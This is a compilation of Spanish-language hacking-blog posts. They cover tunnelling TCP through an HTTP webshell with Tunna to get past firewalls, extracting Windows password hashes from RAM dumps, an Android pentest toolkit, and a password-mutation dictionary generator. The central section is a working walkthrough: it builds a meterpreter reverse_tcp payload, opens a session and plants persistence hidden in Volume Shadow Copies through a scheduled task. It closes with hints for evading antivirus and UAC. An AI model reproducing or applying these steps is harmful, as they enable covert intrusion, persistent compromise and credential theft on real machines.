Crea un tunel TCP a través de HTTP mediante Tunna

Tunna es un conjunto de herramientas de Nikos Vassakis para "envolver" y tunelizar cualquier comunicación TCP a través de HTTP. Es decir, puede ser utilizada para eludir las restricciones en redes protegidas por firewalls.

Básicamente consiste en una aplicación local (en Ruby o Python) y una aplicación web (ASP.NET, Java o PHP):

En entornos corporativos en los que se permite la navegación HTTP hacia Internet, un usuario podría conectarse al webshell de un servidor remoto estableciendo un túnel y eludiendo las reglas del firewall, siempre y claro está  que no haya una pasarela con deep inspection que analice el tráfico que lo atraviesa.

Este framework puede funcionar como proxy para hacer la conexión al cliente más transparente y además puede integrarse con Metasploit. Se ha comprobado su funcionamiento bajo los siguientes entornos:

- script ASP.NET - probado en IIS 6+8 (windows server 2003/2012)
- script JSP - probado en Apache Tomcat (windows + linux)
- script PHP - probado en LAMP + XAMPP + IIS (windows + linux)

uso():

ruby proxy.rb -u -p -r [options]
o
python proxy.py -u -p -r [options]

-u, --url URL url of the remote webshell
-l, --lport PORT local port of proxy
-r, --rport PORT remote port of service for the webshell to connect to
-q, --ping-interval NUM webshprx pinging thread interval (default = 0.5)
-a, --addr IP address for remote webshell to connect to (default = 127.0.0.1)
-b, --buffer BUFF HTTP request size (some webshels have limitations on the size)
-s, --start-ping start the pinging thread first - some services send data first (SSH)
-v, --verbose verbose output - for debugging purposes
-h, --help Display this screen
 
Ejemplo:

ruby proxy.rb -u http://10.0.0.33:81/tun/conn.aspx -l 4444 -r 3389 -v

En una red en la que sólo se permite la salida al puerto TCP/81, el comando anterior inicia un conexión entre el webshell y el servicio RDP (3389) remoto. De esta manera el cliente podrá conectar al servicio RDP del servidor atacando al puerto 4444 de localhost.

Ej. (linux): rdesktop localhost:4444 

Fuente: http://www.secforce.com/research/tunna.html
http://www.hackplayers.com/2013/09/tunel-tcp-traves-de-http-mediante-tunna.html

Volatility Framework: Obteniendo hashes de un volcado de RAM

Hoy vamos a ver como recuperar tanto los LSA Secrets de un volcado de RAM, como un volcado de hashes, que se encuentren en la SAM. Lo más interesante, es que podremos entender como realizar dichas acciones consiguiendo las direcciones donde el plugin correspondiente de Volatility debe buscarlo. En otras palabras, hay que entender porque realizamos dichas acciones, ya que nos dan pie a muchas otras.

PoC: Recuperando hashes de un volcado y los LSA Secrets

Para descubrir la direcciones de memoria donde se encuentra la SAM, Security, etcétera, se utilizará el plugin hivelist. La sintaxis es sencilla vol -f hivelist.

Lo interesante de la ejecución anterior es la dirección virtual obtenida. Con ella podremos utilizar otros plugins para obtener otro tipo de información, por ejemplo en el caso de las LSA Secrets existe un plugin denominado lsadump con el que podremos obtener el contenido de dicho contenedor. Para ello, el plugin nos pide la dirección virtual de System y Security. La sintaxis es sencilla, vol -f -y -s SECURITY>.

Por último vamos a estudiar el plugin hashdump de Volatility Framework. Con este plugin podemos obtener un volcado de usuarios y hashes de la SAM de Windows. Para llevar a cabo dicha acción la sintaxis es la siguiente vol -f -y -s .

Interesante herramienta y plugins Volatility Framework, próximamente más artículos sobre esta herramienta forense que hace que el análisis de RAM sea mucho más llevadero.

Fuente:http://www.flu-project.com/volatility-framework-obteniendo-hashes-de-un-volcado-de-ram.html

Ocultar payloads persistentes en volúmenes 'shadow copy' de Windows

En Windows el servicio Volume Shadow Copy (VSS) crea copias de seguridad (snapshots) cada vez que hay un cambio en el sistema para poder tener disponible y actualizado un punto de restauración. Esta información de backup se almacena en volúmenes "ocultos" cuyas peculiaridades pueden ser aprovechadas con fines maliciosos, como por ejemplo ocultar artefactos de malware...

Recientemente se ha desarrollado un módulo de Metasploit para crear un payload persistente en un VSS en Windows 7. Se basa en el script VSSOwn de Tim Tomes y Mark Baggett y lo que hace es subir un ejecutable, crear un backup (VSS), borrarlo y ejecutar  \?\GLOBALROOT\/HarddiskVolumeShadowCopy\d{1,3}/%TEMP%\executable. 
La persistencia se consigue mediante una tarea programada (SCHTASK) o en una clave AUTORUN.

De momento para utilizarlo lo podemos descargar de Github:

root@kali:~# wget https://raw.github.com/MrXors/metasploit-framework/f345414832fe0895e6ed89e70eb57f72a103aeaf/modules/exploits/windows/local/vss_persistence.rb
root@kali:~# mv vss_persistence.rb /usr/share/metasploit-framework/modules/post/windows/manage/

Para probar generaremos un payload de prueba:

root@kali:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.177.128 LPORT=80 X > payload_prueba.exe

A continuación ejecutaremos la consola de Metasploit y recargaremos los módulos:

root@kali:~/# msfconsole -L
msf > reload_all
[*] Reloading modules from all module paths...
                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##
                            http://metasploit.pro


Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with
Metasploit Pro -- type 'go_pro' to launch it now.

       =[ metasploit v4.7.1-2013100901 [core:4.7 api:1.0]
+ -- --=[ 1207 exploits - 728 auxiliary - 202 post
+ -- --=[ 314 payloads - 30 encoders - 8 nops

Lo siguiente será obtener una sesión meterpreter. Hay que tener en cuenta que nuestro nuevo módulo es de post-explotación y que necesitamos que el usuario de la sesión tenga privilegios administrativos. En caso contrario tendremos que hacer uso de otro módulo para la escalación de privilegios local.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set LHOST 192.168.177.128
LHOST => 192.168.177.128
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.177.128:80 
[*] Starting the payload handler...

[*] Sending stage (770048 bytes) to 192.168.177.1
[*] Meterpreter session 1 opened (192.168.177.128:80 -> 192.168.177.1:4222) at 2013-10-16 06:07:56 -0100

meterpreter > getuid
Server username: PANDORA\vmotos
meterpreter > sysinfo
Computer        : PC102-23DRW
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : es_ES
Meterpreter     : x86/win32

Ahora dejaremos en background la sesión para finalmente ejecutar el exploit:

meterpreter > background 
[*] Backgrounding session 1...


msf exploit(handler) > sessions

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  2   meterpreter x86/win32  PANDORA\vmotos @ PC102-23DRW  192.168.177.128:80 -> 192.168.177.1:5350 (192.168.177.1)
  
msf exploit(handler) > use post/windows/manage/vss_persistence 

msf exploit(vss_persistence) > show options

Module options (exploit/windows/manage/vss_persistence):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DELAY    1                yes       Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.
   EXECUTE  true             yes       Run the EXE on the remote system.
   RPATH                     no        Path on remote system to place Executable. Example: \\Windows\\Temp (DO NOT USE C:\ in your RPATH!)
   RUNKEY   false            yes       Create AutoRun Key for the EXE
   SCHTASK  false            yes       Create a Scheduled Task for the EXE.
   SESSION                   yes       The session to run this module on.
   VOLUME   C:\              yes       Volume to make a copy of.


Exploit target:

   Id  Name
   --  ----
   0   Windows 7

msf exploit(vss_persistence) > set SCHTASK true
SCHTASK => true

msf exploit(vss_persistence) > set session 1
session => 1

msf exploit(vss_persistence) > exploit

[*] Started reverse handler on 192.168.177.128:4444 
[*] Checking requirements...
[*] Starting Volume Shadow Service...
[*] Volume Shadow Copy service not running. Starting it now...
[*] Volume Shadow Copy started successfully.
[*] Uploading payload...
[*] Creating Shadow Volume Copy...
[*] ShadowCopy created successfully
[*] Finding the Shadow Copy Volume...
[*] Deleting malware...
[*] Executing \Windows\Temp\svhost69.exe...
[*] Sending stage (770052 bytes) to 192.168.177.128
[*] Creating Scheduled Task...
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.134:4917) at 2013-10-16 06:15:32 -0100

Y ya lo tenemos.

pd. Si habéis seguido estos pasos ya os habréis dado cuenta: en el momento de su ejecución el motor de análisis en tiempo real del AV detectará el payload. Para evitarlo se podría montar el volumen oculto (VSC) como si fuera una unidad de red o seguir otras técnicas. Además necesitarás desactivar/evadir UAC...

Fuente:http://www.hackplayers.com/2013/10/ocultar-payloads-persistentes-en-vss.html

Bugtroid, un arsenal en tu dispositivo Android

Bugtroid es una aplicación para sistemas operativos Android desarrollada por el equipo de  Bugtraq que reúne unas 200 aplicaciones relacionadas con temas de auditoria de seguridad, ya sea anonimato, auditoria web, de redes o temas forenses entre otras muchas categorías.

Como condición indispensable para exprimirla al máximo, es necesario ser root en el terminal. En cuanto a sus versiones, podemos acceder a ella de dos formas, una gratuita y otra de pago. La primera nos permite probar algunas aplicaciones y poco más, es principalmente una lista de todas las aplicaciones disponibles para hacernos una idea de la cantidad de herramientas que la componen. La potencia de la aplicación viene si compramos la versión PRO de ésta, por  apenas 1,85€ disponemos de todas las posibilidades.

Su funcionamiento es sencillo, se trata de una lista de aplicaciones organizadas por categorías, cuando seleccionamos una, ésta se instala en nuestro dispositivo. Esto nos ayuda a tener solo instaladas las aplicaciones que queramos y no "ensuciar" nuestro dispositivo de herramientas que no vayamos a utilizar o que no sean compatibles.
En este último punto aparece la principal queja que tengo de la aplicación, y es que no sabes si la aplicación que estas instalando es compatible con tu dispositivo. Entiendo que la solución no es sencilla ya que ni los mismos desarrolladores de las aplicaciones muchas veces saben todos los dispositivos compatibles con ellas, pero si se implementara o si apareciera una lista con los dispositivos probados seria interesante.

Sin contar el anterior detalle, la aplicación recoge un completísimo catálogo y nos permite descubrir muchas aplicaciones que de otra forma ignoraríamos.

En cuanto a la aplicación, el primer menú que nos encontramos cuando la abrimos nos permite escoger entre aplicaciones de Android o de GNU/Linux junto con un menú de opciones que nos permite instalar los interpretes de Python, perl y ruby además de ajustar algunos parámetros.
 

Como he comentado antes, en su menú encontramos todo tipo de aplicaciones clasificadas por categorías, estas aplicaciones son por ejemplo WifiKill o Intercepter-ng por comentar algunas tratadas en este blog (mas adelante analizaré más ;) ). Para su utilización basta con seleccionarla e instalarla, después veremos un acceso directo en el escritorio o en la versión PRO podemos ejecutarlas desde la misma Bugtroid.

Para descargar la versión gratuita:

https://play.google.com/store/apps/details?id=com.bugtroid.free.es

En cuanto a la versión de pago:

https://play.google.com/store/apps/details?id=com.bugtroid

En resumen, un completo catalogo de aplicaciones disponible para nuestros dispositivos que el equipo de Bugtraq se ha encargado de recoger para nosotros.

NOTA: Las mejores herramientas solo están disponibles en instalación PRO, así que si usamos la libre podremos usar prácticamente solo el modulo de anonimato.

Fuente: http://blog.0verl0ad.com/2013/10/bugtroid-un-arsenal-en-tu-dispositivo.html

Mutator: un generador de listas de contraseñas mutadas

Frecuentemente muchas contraseñas de usuarios de empresa son nombres genéricos con cambios (sustituyendo las vocales por números) a las que se le añade un carácter y/o el año. Por ejemplo: corporation: C0rp0r4t10n_2012. 

Podéis imaginar que un ataque de fuerza bruta es muchísimo más efectivo si se eligen los nombres adecuados (nombres de compañía, departamentos, administradores de dominio, etc.) y se generan las mutaciones pertinentes.

Mutator de @AloneInTheShell es una herramienta escrita en C que nos ayudará a generar un diccionario acorde con mutaciones del tipo:

* Mutaciones de mayúsculas/minúsculas (toUpper, ToLower, FirstCharUpper, SwapCase)
* A mutación l33t
* Añadir carácter especial
* Anexar cadena de una lista predefinida
* Añadir fecha

Sintaxis: mutator [options] wordlist

Opciones:
    -v, --version          Muestra información de la versión
    -h, --help             Muestra esta ayuda
    -o, --output [file]    Fichero donde escribirá los resultados
    -f, --file [file]*     Fichero del cual leerá las palabras
    -w, --word [word]*     Palabra a mutar
    -b, --basic            Sólo mutaciones tipo "case" y "l33t"
    -a, --advanced         Sólo mutaciones avanzadas
    -y, --years=[year]     No añadir año, es posible especificar un rango de añios
    -x, --specials         No añadir caracteres especiales
    -s, --strings          No añadir cadenas prefijadas

    Al menos se requiere la opción -w o -f

Instalación:
 
* Desde el repositorio:

$ git clone https://bitbucket.org/alone/mutator
$ cd mutator
$ make
 
* Desde el tarball:

$ wget https://bitbucket.org/alone/mutator/downloads/mutator_release-vX.X.X.tar.gz
$ tar -xvzf mutator_release-vX.X.X.tar.gz
$ cd mutator
$ make

Ejemplos de uso:

$ ./mutator -w company -o company.dic

$ for i in $(cat user.dic);do ./mutator -w $i -o $i.dic; done

$ ./mutator -w prueba
[+] Number of words to mutate: 1
[+] Current word: 'prueba'
    [-] Basics mutations generated: 6
    [-] To leet mutations generated: 5
    [-] Special chars mutations generated: 108
    [-] Append strings mutations generated: 1053
    [-] Append year mutations generated: 1170
[+] Total mutations generated: 1170

Fuente: https://bitbucket.org/alone/mutator
http://www.hackplayers.com/2013/10/mutator-wordlist-generator.html